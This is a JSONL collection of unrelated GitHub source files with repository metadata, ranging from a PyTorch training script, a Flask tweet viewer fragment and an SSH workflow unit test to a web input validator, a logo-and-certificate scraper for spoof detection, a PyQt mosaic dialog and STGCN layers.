[json.dumps(json_obj) for json_obj in searched_tweets]\n # print(type(tweets))\n for tweet in searched_tweets:\n print(type(tweet))\n return render_template('view_hashtags.html',tweets=searched_tweets,trends=trends_woeid,hashtag=hashtag)\n\n","repo_name":"daksh2298/hci","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22483312178","text":"import unittest\nimport os\nfrom ibis.model.ssh import SSH\nfrom ibis.utilities.config_manager import ConfigManager\nfrom ibis.settings import UNIT_TEST_ENV\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass SSHActionFunctionsTest(unittest.TestCase):\n \"\"\"Tests the functionality of the Shell Action 
class\"\"\"\n\n def setUp(self):\n self.cfg_mgr = ConfigManager(UNIT_TEST_ENV)\n self.ssh_params = {\n 'cfg_mgr': self.cfg_mgr, 'action_type': 'ssh',\n 'name': 'fake_model',\n 'user': 'fake_open',\n 'error': 'fake_model_run_log_status_failure',\n 'execute': 'exec bash /home/fake_open/scripts/fake_openSAS.sh' + ' fake_model_'\n 'v001_t001.sas 57 1005',\n 'ok': 'fake_model_run_log_status_success',\n 'host': 'fake.sas.server',\n 'args': ['argument1'], 'capture_output': 'false'}\n\n self.my_ssh = SSH(**self.ssh_params)\n\n def test_get_execute(self):\n self.assertEquals(self.ssh_params['execute'],\n self.my_ssh.get_execute())\n\n def get_host(self):\n self.assertEquals(self.ssh_params['host'], self.my_ssh.get_host())\n\n def get_user(self):\n self.assertEquals(self.ssh_params['user'], self.my_ssh.get_user())\n\n def test_get_args(self):\n self.assertEquals(self.ssh_params['args'], self.my_ssh.get_args())\n\n def test_get_capture_output(self):\n self.assertTrue(not self.my_ssh.get_capture_output())\n\n def test_import_prep(self):\n \"\"\"Test create import_prep action\"\"\"\n params = {\n 'cfg_mgr': self.cfg_mgr, 'action_type': 'ssh',\n 'name': 'fake_model_run',\n 'user': 'fake_username',\n 'error': 'fake_model_run_log_status_failure',\n 'execute': 'exec bash /home/fake_open/scripts/fake_openSAS.sh' + ' fake_model_'\n 'v001_t001.sas 57 1005',\n 'ok': 'fake_model_run_log_status_success',\n 'host': 'fake.sas.server', 'args': ['argument1'],\n 'capture_output': 'false'}\n my_ssh = SSH(**params)\n with open(os.path.join(BASE_DIR, 'expected/ssh.xml'), 'r') as my_file:\n expected = my_file.read()\n self.assertEquals(\n str(my_ssh.generate_action()).strip(), expected.strip())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Cigna/ibis","sub_path":"ibis/model/tests/test_ssh_action.py","file_name":"test_ssh_action.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"61"} +{"seq_id":"21678668546","text":"import sys\nimport copy\ndef isredundant(i, dic):\n L1 = copy.deepcopy(dic[i[1]])\n L1.remove(i[0])\n for x in L1:\n if i[0] in dic[x]:\n return True\n return False\nfile_name = input('which data file do you want to use? ')\ntry:\n with open(f'{file_name}', 'r') as file:\n relation = file.readlines()\n file.closed\nexcept FileNotFoundError:\n print('Dont\\'t find file. 
')\n sys.exit()\n\nprint(relation)\nfor i in range(len(relation)):\n relation[i] = relation[i].replace('R', '')\n relation[i] = relation[i].replace('(', '')\n relation[i] = relation[i].replace(')', '')\n relation[i] = relation[i].replace('\\n', '')\n relation[i] = relation[i].split(',')\n for j in range(len(relation[i])):\n relation[i][j] = int(relation[i][j])\nprint(relation)\n\ndic = {}\nfor i in range(len(relation)):\n for j in range(len(relation[i])):\n if relation[i][j] not in dic:\n dic.update({relation[i][j]:[]})\nfor i in range(len(relation)):\n dic[relation[i][1]].append(relation[i][0])\n\nfor i in dic:\n for j in dic:\n if i in dic[j]:\n for z in dic[i]:\n dic[j].append(z)\nfor i in dic:\n dic[i] = set(dic[i])\nprint(dic)\n\nredundant_relation = []\nfor i in relation:\n if isredundant(i, dic):\n redundant_relation.append(i)\nfor i in redundant_relation:\n relation.remove(i)\nprint(relation)\nprint('The nonredundant facts are:')\nfor i in relation:\n print(f'R({i[0]},{i[1]})')\n\n","repo_name":"ryanhe919/COMP9021","sub_path":"Assignment_1/Question4/nonredundant.py","file_name":"nonredundant.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4290917369","text":"'''\r\nAdam Roy\r\nAssignment 5\r\nCSCI 161\r\n'''\r\n\r\ndef main():\r\n title = str(input('Enter a title: '))\r\n print('You entered: ', title)\r\n col1 = input('Enter the name of column 1: ')\r\n print('You entered: ', col1)\r\n col2 = input('Enter the name of column 2: ')\r\n print('You entered: ', col2)\r\n inp = 0\r\n liststr = []\r\n listint = []\r\n while inp != '-1':\r\n inp = input('Enter a data (-1 to stop input): ')\r\n comma = 0\r\n for i in range(0, len(inp)):\r\n if inp[i] == ',':\r\n comma += 1\r\n if comma == 1:\r\n string = inp.split(',')\r\n if string[1].isnumeric() == True:\r\n liststr.append(string[0])\r\n listint.append(string[1])\r\n else:\r\n print('\\nComma not followed by an integer.\\n')\r\n elif comma == 0:\r\n print('\\nNo comma in string.\\n') \r\n elif comma > 1:\r\n print('\\nToo many commas in string.\\n') \r\n print('{:^42}'.format(title))\r\n print('{:<20}'.format(col1), '{:>23}'.format(col2))\r\n for i in range(0, len(liststr)):\r\n print('{:<20}'.format(liststr[i]), '|', '{:>17}'.format(listint[i]))\r\n i += 1\r\n \r\nmain()","repo_name":"adamr814/College_Course_Code","sub_path":"CSCI 161/Lab 5/Roy_Adam_Assignment_5.py","file_name":"Roy_Adam_Assignment_5.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38268845365","text":"\nimport os, json, types, re\nfrom util_web import SuccessResp, ErrorResp\n\nfileRegEx = r'[^A-Za-z0-9_\\-\\.].*'\nfileSlashRegEx = r'[^A-Za-z0-9_\\-\\.\\//].*'\n\ndef _dataIdOrUrl (dataId, url, data, required=False):\n if dataId in data:\n _validateString(dataId, data)\n _validatePathName(data[dataId], dataId)\n elif url in data:\n _validateString(url, data)\n elif required:\n raise ErrorResp(\n dataId + ' or ' + url + ' parameter missing or malformed')\n\n\ndef _validateFileName (dirty, name, allowSlash=False):\n '''\n check to be sure this is a file-safe name without any problem characters\n Valid characters:\n a-z, A-Z, 0-9, dash (-), dot (.), underscore (_)\n All other characters are replaced with underscores.\n @param dirty: the string to check\n @param name: the data property name\n @param allowSlash: allow a slash (/) in the string for paths\n @return: 
nothing or raise an ErrorResp\n '''\n msg = name + ' parameter may only contain the characters:' + \\\n ' a-z, A-Z, 0-9, dash (-), dot (.), underscore (_)'\n if allowSlash:\n regex = fileSlashRegEx\n msg += ', slash (/)'\n else:\n regex = fileRegEx\n\n search = re.search(regex, dirty)\n if not search == None:\n raise ErrorResp(msg)\n\n\ndef _validateInteger (name, data, required=False):\n if name in data:\n try:\n val = int(data[name])\n except ValueError:\n raise ErrorResp(name + ' parameter must be an integer')\n elif required: # name is not in data\n raise ErrorResp(name + ' parameter missing or malformed')\n\n\ndef _validatePathName (dirty, name):\n _validateFileName (dirty, name, allowSlash=True)\n\n\ndef _validateString(name, data, required=False, arrayAllowed=False):\n '''\n Validate a string or an array of strings.\n @param name: the name of the property in the data\n @param data: the object in which the property resides\n @param required: this property is required in the data, optional,\n defaults to false\n @param arrayAllowed: an array of strings are allowed for this property,\n optional, defaults to false\n @return: nothing or raise an ErrorResp\n '''\n if name in data:\n val = data[name]\n if isinstance(val, types.StringTypes):\n if len(val) < 1:\n raise ErrorResp(name +\n ' parameter must have a string length greater than one')\n _validateStringChars(val, name)\n else:\n \n # This is not a string, but maybe an array.\n if arrayAllowed:\n if not isinstance(val, list):\n raise ErrorResp(name +\n ' parameter should be a string or an array of strings')\n \n # Check each string in the array\n for value in val:\n if not isinstance(value, types.StringTypes):\n raise ErrorResp(name +\n ' parameter should be a string or an array of strings')\n _validateStringChars(value, name)\n else:\n raise ErrorResp(name + ' parameter should be a string')\n\n elif required: # name is not in data\n raise ErrorResp(name + ' parameter missing or malformed')\n\n\ndef _validateStringChars(val, name):\n '''\n Look for any non-printable characters in a string value, non-printables are\n ascii decimal codes 0-31 and 127-255.\n @param val: the string value\n @param name: the name of the parameter\n @return: nothing or raise an ErrorResp\n '''\n regex = r'[\\x00-\\x1f\\x7f-\\xff]'\n search = re.search(regex, val)\n if not search == None:\n raise ErrorResp(name +\n ' parameter should only contain printable characters')\n\n\ndef attributes(data, required=False):\n _validateString('attributes', data, required, arrayAllowed=True)\n\n\ndef authGroup(data):\n _validateString('authGroup', data)\n\n\ndef byteSize (data):\n name = 'byteSize'\n _validateInteger (name, data)\n if name not in data:\n raise ErrorResp('byteSize parameter is required')\n\n\ndef cleanFileName (dirty):\n\n # Convert a string to a clean string that may be used as a file name.\n # Valid characters:\n # a-z, A-Z, 0-9, dash (-), dot (.), underscore (_)\n # All other characters are replaced with underscores.\n if not dirty:\n return None\n \n clean = ''\n if re.search(fileRegEx, dirty) == None:\n clean = dirty\n else:\n for i in range(0, len(dirty)):\n if re.search(fileRegEx, dirty[i]) == None:\n clean += dirty[i]\n else:\n clean += '_'\n return clean\n\n\ndef colorAttribute (data, required=False):\n _dataIdOrUrl('colorAttributeDataId', 'colorAttributeUrl', data, required)\n\n\ndef email(data):\n _validateString('email', data, required=False, arrayAllowed=True)\n\n\ndef emailSingleRequired(data):\n _validateString('email', data, 
required=True)\n\n\ndef layout(data, required=False):\n _validateString('layout', data, required)\n\n\ndef layoutInput (data, required=False):\n _dataIdOrUrl('layoutInputDataId', 'layoutInputUrl', data, required)\n\n\ndef layoutInputName(data, required):\n _validateString('layoutInputName', data, required, True)\n\n\ndef major(data):\n _validateString('major', data, required=True)\n\n\ndef map(data, required):\n _validateString('map', data, required)\n\n # Is the name file-safe?\n val = data['map']\n slashCount = val.count('/')\n \n if slashCount > 1:\n raise ErrorResp('map IDs may not contain more than one slash')\n \n else:\n _validateFileName(val, 'map', allowSlash=True)\n\n\ndef minor(data):\n _validateString('minor', data)\n\n\ndef neighborCount (data):\n name = 'neighborCount'\n _validateInteger (name, data)\n if name in data:\n if data[name] < 1 or data[name] > 30:\n raise ErrorResp('neighborCount parameter must be within the range, 1-30')\n\n\ndef nodes(data, required=False):\n _validateString('nodes', data, required, arrayAllowed=True)\n\n\ndef token(data):\n _validateString('token', data, required=True)\n\n\ndef viewServer(data):\n if 'viewServer' not in data:\n return\n _validateString('viewServer', data)\n","repo_name":"Stuartlab-UCSC/hexmap-data","sub_path":"www/validate_web.py","file_name":"validate_web.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71311346756","text":"import os\nimport sys\nimport time\nimport logging\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.dirname(SCRIPT_DIR))\n\nfrom src.dataset import get_dataloader_from_cfg\nfrom src.model import get_model_from_cfg\nfrom src.optim import create_optimizer_with_scheduler_from_cfg\nfrom src.loss import BCEWithLogitsLoss\nfrom src.evaluate import evaluate\nfrom src.utils.checkpoint import save_checkpoint, load_checkpoint\nfrom src.utils.checkpoint import save_checkpoint, load_checkpoint\n\ncheckpoint_path = \"checkpoint.pth\"\n\ndef train(config: dict, save_dir: str):\n\n # Set logger\n logger = logging.getLogger(\"__main__\")\n logger.info(f\"Config: {config}\")\n\n # Device\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n logger.info(f\"Device: {device}\")\n\n # Loading cfgs\n train_cfg = config[\"train\"]\n test_cfg = config[\"test\"]\n\n # Loading data\n train_set, train_loader = get_dataloader_from_cfg(train_cfg[\"data\"])\n test_set, test_loader = get_dataloader_from_cfg(test_cfg[\"data\"])\n logger.info(f\"Training data: {len(train_set)}, Testing data: {len(test_set)}\")\n\n # Init model\n model_cfg = config[\"model\"]\n model = get_model_from_cfg(model_cfg)\n model = model.to(device)\n model.train()\n \n # Define criterion\n criterion = BCEWithLogitsLoss()\n\n # Defining optimizer and scheduler\n optimizer, scheduler = create_optimizer_with_scheduler_from_cfg(model.parameters(), train_cfg)\n\n # Resume training\n resume_ckpt = train_cfg.get(\"resume_ckpt\", \"\")\n start_epoch = 0\n if torch.cuda.is_available() and os.path.exists(resume_ckpt):\n start_epoch = load_checkpoint(model, optimizer, resume_ckpt)\n scheduler.set_last_epoch(start_epoch)\n logger.info(f\"{model}\")\n \n # Define training params\n num_epochs = train_cfg['epochs']\n start_time = time.time()\n\n # MLflow trace\n for epoch in range(start_epoch, num_epochs):\n # Train\n total_loss = 0.0\n running_loss = 0.0\n 
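        # Mini-batch loop below: the standard PyTorch update cycle
        # (optimizer.zero_grad -> forward -> criterion -> loss.backward ->
        # optimizer.step); running_loss feeds the periodic progress log while
        # total_loss accumulates for the per-epoch average.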
for i, (inputs, labels) in enumerate(train_loader):\n inputs, labels = inputs.to(device), labels.to(device)\n labels = labels.view(-1, 1).float()\n\n # set zero gradient\n optimizer.zero_grad()\n\n # forward\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n # backward\n loss.backward()\n # optimization\n optimizer.step()\n\n running_loss += loss.item()\n total_loss += loss.item()\n if i % 5 == 4: # output verbose each ten steps\n elapsed_time = time.time() - start_time\n estimated_time = (elapsed_time / (epoch * len(train_loader) + i + 1)) * (num_epochs * len(train_loader))\n time_remaining = estimated_time - elapsed_time\n logger.info(f\"[Epoch {epoch + 1}, Mini-batch {i + 1}] loss: {running_loss / 10:.6f}, elapsed time: {elapsed_time:.2f} seconds, estimated total time: {estimated_time:.2f} seconds, time remaining: {time_remaining:.2f} seconds\")\n running_loss = 0.0\n\n average_loss = total_loss / len(train_loader.dataset)\n \n # Evaluate\n metrics = evaluate(test_cfg, model, test_loader, criterion, device)\n logger.info(f\"[Epoch {epoch + 1}] train loss: {average_loss:.6f}, evaluate loss: {metrics['evaluate_loss']:.6f}, AUC: {metrics['AUC']:.3f} with optimal threashold: {metrics['optimal_threshold']:.3f}, accuracy: {metrics['accuracy']:.3f}, precision: {metrics['precision']:.3f}, recall: {metrics['recall']:.3f}, f1_score: {metrics['f1_score']:.3f}\")\n \n # Save model\n checkpoint_dir = os.path.join(save_dir, 'checkpoints')\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n save_path = os.path.join(checkpoint_dir, f'epoch_{epoch + 1}.pth')\n save_checkpoint(epoch, model, optimizer, save_path)\n scheduler.step()\n\n # Save the last epoch\n save_path = os.path.join(checkpoint_dir, 'last.pth')\n save_checkpoint(epoch, model, optimizer, save_path)\n logger.info(\"$END_OF_LOGS$\")\n\n","repo_name":"PPPPierre/Landfill_Prediction","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543613331","text":"import sys\r\n\r\nCANT_SOLVE = 'IMPOSSIBLE'\r\nDEBUG = False\r\nimport re\r\n\r\ndef solveCase(happyString, k):\r\n happyArray = [char == '+' for char in happyString]\r\n #Greedy:\r\n nFlips = 0\r\n for i in range(len(happyArray)):\r\n if not happyArray[i]:\r\n #Check flip is OK\r\n if not (i+k-1 < len(happyArray)):\r\n return CANT_SOLVE\r\n\r\n else:\r\n #left Flip\r\n nFlips = nFlips + 1\r\n for f in range(k):\r\n flipIndex = i+f\r\n happyArray[ flipIndex ] = not happyArray[ flipIndex ]\r\n if DEBUG:\r\n print(\r\n \"Flip num %s to %s\" % (\r\n nFlips,\"\".join(\r\n [\"+\" if x else '-' for x in happyArray]\r\n )\r\n )\r\n )\r\n #End of flipping, just verify that all are ok, as they must be\r\n for i in range(len(happyArray)):\r\n if not happyArray[i]:\r\n raise RuntimeError(\"Greedy flipping has failed to flip all or \"\r\n \"notify impossibility\")\r\n \r\n return nFlips\r\n\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) < 3:\r\n print(\"Usage: pancake.py inputfile outputfile\", file=sys.stderr)\r\n sys.exit()\r\n\r\n with open(sys.argv[1], 'r') as fin:\r\n nCases = int(fin.readline().strip())\r\n\r\n with open(sys.argv[2], 'w') as fout:\r\n for caseNumMinusOne in range(nCases):\r\n line = fin.readline().strip()\r\n (happyString, kString) = re.split(r'\\s+', line)\r\n\r\n print(\r\n 'Case #%s: %s' % (\r\n caseNumMinusOne + 1,\r\n solveCase(happyString, int(kString)),\r\n ),\r\n file = fout,\r\n )\r\n 
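            # Worked example (illustrative, not from the original source): for
            # '---+-++-' with k=3 the greedy sweep in solveCase flips the k-wide
            # window at the leftmost '-' each time (indices 0, 4, then 5),
            # leaving all '+' after 3 flips, so the line printed is 'Case #n: 3'.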
\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2496.py","file_name":"2496.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74321810113","text":"\"\"\"Debugging functions\"\"\"\n\n__appname__ = \"oaks_debugme.py\"\n\nimport csv\nimport sys\nimport doctest\n\n#Define function\ndef is_an_oak(name):\n\n    \"\"\" Returns True if name starts with 'quercus'.\n\n    >>> is_an_oak('Quercus')\n    True\n\n    >>> is_an_oak('Fraxinus')\n    False\n\n    >>> is_an_oak('Quercuss')\n    True\n\n    >>> is_an_oak('Pinus')\n    False\n\n    \"\"\"\n    return name.lower().startswith('quercus')\n\ndef main(argv): \n\n    \"\"\"Defines the main function\"\"\"\n    \n    f = open('../data/TestOaksData.csv','r')\n    g = open('../data/JustOaksData.csv','w')\n    taxa = csv.reader(f)\n    csvwrite = csv.writer(g)\n    oaks = set()\n    for row in taxa:\n        print(row)\n        print(\"The genus is: \")\n        print(row[0] + '\\n') \n        if is_an_oak(row[0]):\n            print('FOUND AN OAK!\\n')\n            csvwrite.writerow([row[0], row[1]])\n    f.close()\n    g.close()\n    return 0\n\nif (__name__ == \"__main__\"):\n    status = main(sys.argv)\n    doctest.testmod()","repo_name":"XW1722/CMEECourseWork","sub_path":"Week2/code/oaks_debugme.py","file_name":"oaks_debugme.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"15522735297","text":"#!/usr/bin/env python3\nimport ssl\nimport shutil\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom entity import Entity\nfrom common import selectors, defaults, mkdir\n\ndef get_page(e: Entity):\n    try:\n        page = requests.get(e.url)\n    except Exception:\n        url = e.url.replace('http', 'https')\n        page = requests.get(url)\n    return page\n\ndef get_cert(e: Entity):\n    ssl_url = e.url.split(\"/\")[2]\n    mkdir.make_dirs([defaults.CERTS_PATH])\n    fn = f\"{defaults.CERTS_PATH}/{e.bco}.cert\"\n\n    try:\n        cert = ssl.get_server_certificate((ssl_url, 443), ca_certs=None)\n        with open(fn, 'w') as f:\n            f.write(cert)\n    except Exception as err:\n        with open(f\"{defaults.DATA_PATH}/{e.bco}.error.log\", 'w+') as f:\n            f.write(str(err))\n    return fn\n\ndef get_img_logo(src: str, fn):\n    res = requests.get(src, stream=True)\n    with open(fn, \"wb\") as f:\n        shutil.copyfileobj(res.raw, f)\n    return fn\n\ndef get_logos(e: Entity):\n    page = get_page(e)\n    soup = BeautifulSoup(page.content, \"html.parser\")\n    logos = soup.select(selectors.img_logo)\n    logos.extend(soup.select(selectors.id_logo))\n    logos.extend(soup.select(selectors.cls_logo))\n\n    mkdir.make_dirs([defaults.LOGOS_DATA_PATH])\n\n    i = 1\n    lfn = []\n    for l in logos:\n        if 'src' in l.attrs:\n            src = l.attrs['src']\n            ext = src.split('.')[-1].split('/')[-1]\n            if not src.startswith('http'): src = e.url + src\n            fn = f\"{defaults.LOGOS_DATA_PATH}/{e.bco}.{i}.{ext}\"\n            lfn.append(get_img_logo(src, fn))\n            i+=1\n    return lfn\n","repo_name":"xaiki/spoof-detect","sub_path":"python/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70969080833","text":"import sys, os.path\nfrom .pyqtgraph_vini.Qt import QtCore, QtGui\nimport numpy as np\nimport math\nimport os\nimport time\nimport copy\n\nfrom .pyqtgraph_vini import *\nfrom .QxtSpanSliderH import QxtSpanSliderH\n\n# testing input\nfrom .testInputs import testFloat, testInteger\n\n\nclass 
MosaicDialog(QtGui.QDialog):\n \"\"\"\n Mosaic dialog window\n \"\"\"\n\n sigEdited = QtCore.Signal()\n sigFinished = QtCore.Signal()\n sigClosed = QtCore.Signal()\n\n def __init__(self):\n super(MosaicDialog, self).__init__()\n\n self.dims = [0,0,0]\n self.rows = 4\n self.cols = 4\n self.start = 0\n self.incr = 1\n self.plane = 't'\n\n # line regions\n self.lr_1 = None\n self.lr_2 = None\n\n self.layout = QtGui.QGridLayout()\n\n self.form_part = QtGui.QWidget()\n self.form = QtGui.QFormLayout()\n self.form_part.setLayout(self.form)\n self.slice_plane = QtGui.QComboBox()\n self.slice_plane.addItem(\"axial\")\n self.slice_plane.addItem(\"sagittal\")\n self.slice_plane.addItem(\"coronal\")\n self.slice_plane.currentIndexChanged.connect(self.entriesEdited)\n # self.slice_plane.currentIndexChanged.connect(self.updatePlane)\n self.form.addRow(\"Choose slice plane:\", self.slice_plane)\n\n # range slider\n self.slider_color = QtGui.QColor()\n self.slider_color.setRgb(255, 110, 0)\n self.slider_block = False\n self.range_sld = QxtSpanSliderH()\n self.range_sld.setRange(0, 255)\n self.range_sld.setSpan(0, 255)\n self.range_sld.setGradientLeftColor(self.slider_color)\n self.range_sld.setGradientRightColor(self.slider_color)\n self.range_sld.spanChanged.connect(self.setRangeFromSlider)\n self.form.addRow(\"Range:\", self.range_sld)\n\n self.start_le = QtGui.QLineEdit(\"0\")\n self.start_le.returnPressed.connect(self.entriesEdited)\n self.start_le.editingFinished.connect(self.entriesEdited)\n self.form.addRow(\"start:\", self.start_le)\n\n self.end_le = QtGui.QLineEdit(\"\")\n self.end_le.returnPressed.connect(self.entriesEdited)\n self.end_le.editingFinished.connect(self.entriesEdited)\n self.form.addRow(\"end:\", self.end_le)\n\n self.rows_le = QtGui.QLineEdit(\"4\")\n self.rows_le.returnPressed.connect(self.entriesEdited)\n self.rows_le.editingFinished.connect(self.entriesEdited)\n self.form.addRow(\"rows:\", self.rows_le)\n\n self.cols_le = QtGui.QLineEdit(\"4\")\n self.cols_le.returnPressed.connect(self.entriesEdited)\n self.cols_le.editingFinished.connect(self.entriesEdited)\n self.form.addRow(\"cols:\", self.cols_le)\n\n self.increment_label = QtGui.QLabel(\"increment:\")\n self.increment_label.setAlignment(\n QtCore.Qt.AlignVCenter | QtCore.Qt.AlignCenter)\n\n # close button\n self.close_button = QtGui.QPushButton('close', self)\n self.close_button.setFocusPolicy(QtCore.Qt.NoFocus)\n self.close_button.clicked.connect(self.closeEvent)\n self.close_button.setShortcut(QtGui.QKeySequence.Quit)\n\n # Slice Button\n self.slice_button = QtGui.QPushButton('Slice to mosaic!', self)\n self.slice_button.setFocusPolicy(QtCore.Qt.NoFocus)\n self.slice_button.clicked.connect(self.slice)\n\n self.layout.addWidget(self.form_part, 0, 0, 6, 6)\n self.layout.addWidget(self.increment_label, 6, 0, 1, 6)\n self.layout.addWidget(self.slice_button, 7, 0, 1, 3)\n self.layout.addWidget(self.close_button, 7, 3, 1, 3)\n\n self.setLayout(self.layout)\n\n def reset(self):\n \"\"\"\n Set the widgets to the correct values.\n \"\"\"\n self.slice_plane.setCurrentIndex(0)\n self.rows_le.setText(\"4\")\n self.cols_le.setText(\"4\")\n self.start_le.setText(\"0\")\n self.end_le.setText(str(int(self.dims[0]-1)))\n self.end = int(self.dims[0]-1)\n # Range slider update\n self.range_sld.setRange(0, self.end-1)\n self.range_sld.setSpan(0, self.end-1)\n self.incr = int(np.floor(self.dims[0]/16))\n\n def setDims(self, n_dims):\n \"\"\"\n Updates the possible dimensions.\n \"\"\"\n if self.dims[0] != n_dims[0] or self.dims[1] != 
n_dims[1] or self.dims[2] != n_dims[2]:\n self.dims = copy.copy(n_dims)\n self.reset()\n\n def closeEvent(self, ev=None):\n self.hide()\n self.sigClosed.emit()\n\n def slice(self):\n self.sigFinished.emit()\n\n def setRangeFromSlider(self):\n \"\"\"\n Sets the values from the range to the line edits and calls for update.\n \"\"\"\n self.slider_block = True\n # print(str(self.range_sld.lowerValue))\n # print(str(self.range_sld.upperValue))\n self.start = self.range_sld.lowerValue\n self.end = self.range_sld.upperValue\n self.start_le.setText(str(self.start))\n self.end_le.setText(str(self.end))\n self.entriesEdited()\n self.slider_block = False\n\n def entriesEdited(self):\n \"\"\"\n Checks if entries are integers and emits signal to process data further.\n \"\"\"\n if testInteger(self.rows_le.text()):\n self.rows = int(self.rows_le.text())\n else:\n return 0\n if testInteger(self.cols_le.text()):\n self.cols = int(self.cols_le.text())\n else:\n return 0\n if testInteger(self.start_le.text()):\n self.start = int(self.start_le.text())\n if self.start < 0:\n self.start = 0\n self.start_le.setText(str(int(self.start)))\n else:\n return 0\n if testInteger(self.end_le.text()):\n self.end = int(self.end_le.text())\n else:\n return 0\n if self.slice_plane.currentIndex() == 1:\n self.plane = 's'\n self.range_sld.setRange(0, self.dims[0]-1)\n if self.end >= self.dims[0]:\n self.end = self.dims[0]-1\n self.end_le.setText(str(int(self.end)))\n self.range_sld.setUpperPosition(self.end)\n if self.slice_plane.currentIndex() == 2:\n self.plane = 'c'\n self.range_sld.setRange(0, self.dims[1]-1)\n if self.end >= self.dims[1]:\n self.end = self.dims[1]-1\n self.end_le.setText(str(int(self.end)))\n self.range_sld.setUpperPosition(self.end)\n if self.slice_plane.currentIndex() == 0:\n self.plane = 't'\n self.range_sld.setRange(0, self.dims[2]-1)\n if self.end >= self.dims[2]:\n self.end = self.dims[2]-1\n self.end_le.setText(str(int(self.end)))\n self.range_sld.setUpperPosition(self.end)\n if not self.slider_block:\n self.range_sld.setSpan(self.start, self.end)\n self.sigEdited.emit()\n","repo_name":"lipsia-fmri/vini","sub_path":"vini/MosaicDialog.py","file_name":"MosaicDialog.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"11036202788","text":"import math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.nn.init as init\r\n\r\n##Before the Temporal Convolution Layer, we need to align the c_in and c_out\r\nclass Align(nn.Module):\r\n def __init__(self, c_in, c_out):\r\n super(Align, self).__init__()\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n #H_in and H_out remain the same since padding =0, stide =1\r\n #W_in and W_out remain the same since padding =0, stide =1\r\n self.align_conv = nn.Conv2d(in_channels=self.c_in, out_channels=self.c_out, kernel_size=(1, 1))\r\n\r\n def forward(self, x):\r\n if self.c_in > self.c_out:\r\n x_align = self.align_conv(x)\r\n elif self.c_in < self.c_out:\r\n batch_size, c_in, timestep, n_vertex = x.shape\r\n x_align = torch.cat([x, torch.zeros([batch_size, self.c_out - self.c_in, timestep, n_vertex]).to(x)], dim=1)\r\n else:\r\n x_align = x\r\n return x_align\r\n\r\nclass CausalConv1d(nn.Conv1d):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, enable_padding=False, dilation=1, groups=1, bias=True):\r\n if enable_padding == True:\r\n self.__padding = (kernel_size - 1) * dilation\r\n else:\r\n 
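            # enable_padding=False: no causal left-padding is added, so the
            # convolution shortens the sequence by (kernel_size - 1) * dilation
            # timesteps and forward() has no padded tail to trim.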
self.__padding = 0\r\n super(CausalConv1d, self).__init__(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=self.__padding, dilation=dilation, groups=groups, bias=bias)\r\n\r\n def forward(self, input):\r\n result = super(CausalConv1d, self).forward(input)\r\n if self.__padding != 0:\r\n return result[: , : , : -self.__padding]\r\n return result\r\n\r\nclass CausalConv2d(nn.Conv2d):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, enable_padding=False, dilation=1, groups=1, bias=True):\r\n kernel_size = nn.modules.utils._pair(kernel_size)\r\n stride = nn.modules.utils._pair(stride)\r\n dilation = nn.modules.utils._pair(dilation)\r\n if enable_padding == True:\r\n self.__padding = [int((kernel_size[i] - 1) * dilation[i]) for i in range(len(kernel_size))]\r\n else:\r\n self.__padding = 0\r\n self.left_padding = nn.modules.utils._pair(self.__padding)\r\n super(CausalConv2d, self).__init__(in_channels, out_channels, kernel_size, stride=stride, padding=0, dilation=dilation, groups=groups, bias=bias)\r\n \r\n def forward(self, input):\r\n if self.__padding != 0:\r\n input = F.pad(input, (self.left_padding[1], 0, self.left_padding[0], 0))\r\n result = super(CausalConv2d, self).forward(input)\r\n return result\r\n\r\nclass TemporalConvLayer(nn.Module):\r\n\r\n # Temporal Convolution Layer (GLU)\r\n #\r\n # |-------------------------------| * residual connection *\r\n # | |\r\n # | |--->--- casual conv ----- + -------| \r\n # -------|----| ⊙ ------>\r\n # |--->--- casual conv --- sigmoid ---| \r\n #\r\n \r\n #param x: tensor, [batch_size, c_in, timestep, n_vertex]\r\n\r\n def __init__(self, Kt, c_in, c_out, n_vertex, act_func, enable_gated_act_func):\r\n super(TemporalConvLayer, self).__init__()\r\n self.Kt = Kt\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n self.n_vertex = n_vertex\r\n self.act_func = 